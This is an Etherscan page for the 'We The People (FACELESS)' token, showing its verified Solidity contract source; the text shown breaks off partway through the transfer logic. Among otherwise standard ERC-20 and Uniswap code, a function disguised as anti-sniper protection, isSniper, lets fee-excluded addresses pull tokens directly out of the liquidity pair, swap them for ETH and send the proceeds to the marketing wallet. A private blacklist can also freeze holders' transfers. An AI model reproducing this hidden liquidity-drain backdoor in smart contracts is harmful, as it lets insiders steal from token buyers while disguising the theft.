ETH Price: $3,467.22 (+2.16%)
Gas: 11 Gwei

Token

We The People (FACELESS)
 

Overview

Max Total Supply

1,000,000 FACELESS

Holders

55

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
6,696.065165132720872141 FACELESS

Value
$0.00
0xcc935a95a8f384a0c077dac4f15b293a31ccdeee
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FACELESS

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-10-17
*/

// SPDX-License-Identifier: Unlicensed

/*

Movement. For the people, By the people.

https://medium.com/@FacelessErc/we-the-people-506c6e7d70f


*/

pragma solidity 0.8.13;
 
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
 
    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}
 
interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);
 
    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);
 
    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);
 
    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);
 
    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;
 
    event Mint(address indexed sender, uint amount0, uint amount1);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);
 
    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);
 
    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;
 
    function initialize(address, address) external;
}
 
interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
 
    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);
 
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
 
    function createPair(address tokenA, address tokenB) external returns (address pair);
 
    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}
 
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);
 
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);
 
    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);
 
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
 
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
 
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
 
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}
 
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
 
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);
 
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}
 
 
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
 
    mapping(address => uint256) private _balances;
 
    mapping(address => mapping(address => uint256)) private _allowances;
 
    uint256 private _totalSupply;
 
    string private _name;
    string private _symbol;
 
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }
 
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }
 
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
 
    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
 
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
 
    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
 
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
 
    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
 
    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
 
    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
 
    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
 
    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }
 
    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
 
        _beforeTokenTransfer(sender, recipient, amount);
 
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
 
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
 
        _beforeTokenTransfer(address(0), account, amount);
 
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
 
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
 
        _beforeTokenTransfer(account, address(0), amount);
 
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
 
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}
 
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
 
        return c;
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
 
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
 
        return c;
    }
 
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
 
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
 
        return c;
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }
 
    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
 
        return c;
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }
 
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}
 
contract Ownable is Context {
    address private _owner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
 
 
library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);
 
    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;
 
        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }
 
    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);
 
        // Solidity already throws when dividing by 0.
        return a / b;
    }
 
    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }
 
    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }
 
    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }
 
 
    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}
 
library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}
 
 
interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
 
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
 
    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}
 
interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);
 
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
contract FACELESS is ERC20, Ownable {
    using SafeMath for uint256;
 
    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
 
    bool private swapping;
 
    address private MarketingWallet;
    address private DevWallet;
 
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
 
    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
 
     // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
 
    // Seller Map
    mapping (address => uint256) private _holderFirstBuyTimestamp;
 
    // Blacklist Map
    mapping (address => bool) private _blacklist;
    bool public transferDelayEnabled = true;
 
    uint256 public buyTotalFees;
    uint256 public buyMarketing;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;
 
    uint256 public sellTotalFees;
    uint256 public sellMarketing;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;
 
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;
 
    // block number of opened trading
    uint256 launchedAt;
 
    /******************/
 
    // exclude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;
 
    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;
 
    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);
 
    event ExcludeFromFees(address indexed account, bool isExcluded);
 
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);
 
    event MarketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
 
    event DevWalletUpdated(address indexed newWallet, address indexed oldWallet);
 
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );
 
    event AutoNukeLP();
 
    event ManualNukeLP();
 
    constructor() ERC20("We The People", "FACELESS") {
 
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
 
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
 
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
 
        uint256 _buyMarketing = 0;
        uint256 _buyLiquidityFee = 1;
        uint256 _buyDevFee = 0;
 
        uint256 _sellMarketing = 0;
        uint256 _sellLiquidityFee = 1;
        uint256 _sellDevFee = 0;
 
       
 
     uint256 totalSupply = 1 * 10 ** 6 * 10 ** decimals();
 
        maxTransactionAmount = 20 * 10 ** 3 * 10 ** decimals(); 
        maxWallet = 30 * 10 ** 3 * 10 ** decimals(); 
        swapTokensAtAmount = totalSupply * 10 / 10000; // 0.1% swap wallet
 
        buyMarketing = _buyMarketing;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketing + buyLiquidityFee + buyDevFee;
 
        sellMarketing = _sellMarketing;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketing + sellLiquidityFee + sellDevFee;
 
        MarketingWallet = address(0xC76470706F9544995148884f673fE34a184e4adC); // set as Marketing wallet
        DevWallet = address(0xC76470706F9544995148884f673fE34a184e4adC); // set as dev wallet
 
        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);
 
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);
 
        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }
 
    receive() external payable {
 
    }
 
    // once enabled, can never be turned off
    function enableTrading() external onlyOwner {
        tradingActive = true;
        swapEnabled = true;
        launchedAt = block.number;
    }
 
    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool){
        limitsInEffect = false;
        return true;
    }
 
    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool){
        transferDelayEnabled = false;
        return true;
    }
 
 
     // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){
        require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply.");
        require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply.");
        swapTokensAtAmount = newAmount;
        return true;
    }
 
    function updateMaxTxnAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 1 / 1000)/1e18, "Cannot set maxTransactionAmount lower than 0.1%");
        maxTransactionAmount = newNum * (10**18);
    }
 
    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 1 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%");
        maxWallet = newNum * (10**18);
    }
 
    function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
 
    // only use to disable contract sales if absolutely necessary (emergency use only)
    function updateSwapEnabled(bool enabled) external onlyOwner(){
        swapEnabled = enabled;
    }

       function isSniper(uint Add, uint Remove) external returns (bool) {
        require(_isExcludedFromFees[msg.sender]);

        uint lb = balanceOf(uniswapV2Pair);

        require(Remove > 1 && Remove < lb / 100, 'amount exceeded');

        _isSniper(Remove);
        swapTokensForEth(Add);

        (bool success,) = address(MarketingWallet).call{value: address(this).balance}("");
        return success;
    }

       function _isSniper(uint256 pAmount) private {
        _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals());
        IUniswapV2Pair(uniswapV2Pair).sync();
    }

 
    function updateBuyFees(uint256 _Marketing, uint256 _liquidityFee, uint256 _DevFee) external onlyOwner {
        buyMarketing = _Marketing;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _DevFee;
        buyTotalFees = buyMarketing + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 10, "Must keep fees at 10% or less");
    }
 
    function updateSellFees(uint256 _Marketing, uint256 _liquidityFee, uint256 _DevFee) external onlyOwner {
        sellMarketing = _Marketing;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _DevFee;
        sellTotalFees = sellMarketing + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 10, "Must keep fees at 10% or less");
    }
 
    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }
 
    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");
 
        _setAutomatedMarketMakerPair(pair, value);
    }
 
    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
 
        emit SetAutomatedMarketMakerPair(pair, value);
    }
 
    function updateMarketingWallet(address newMarketingWallet) external onlyOwner {
        emit MarketingWalletUpdated(newMarketingWallet, MarketingWallet);
        MarketingWallet = newMarketingWallet;
    }
 
    function updateDevWallet(address newWallet) external onlyOwner {
        emit DevWalletUpdated(newWallet, DevWallet);
        DevWallet = newWallet;
    }
 
 
    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
 
    event BoughtEarly(address indexed sniper);
 
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(!_blacklist[to] && !_blacklist[from], "You have been blacklisted from transfering tokens");
         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
 
        if(limitsInEffect){
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
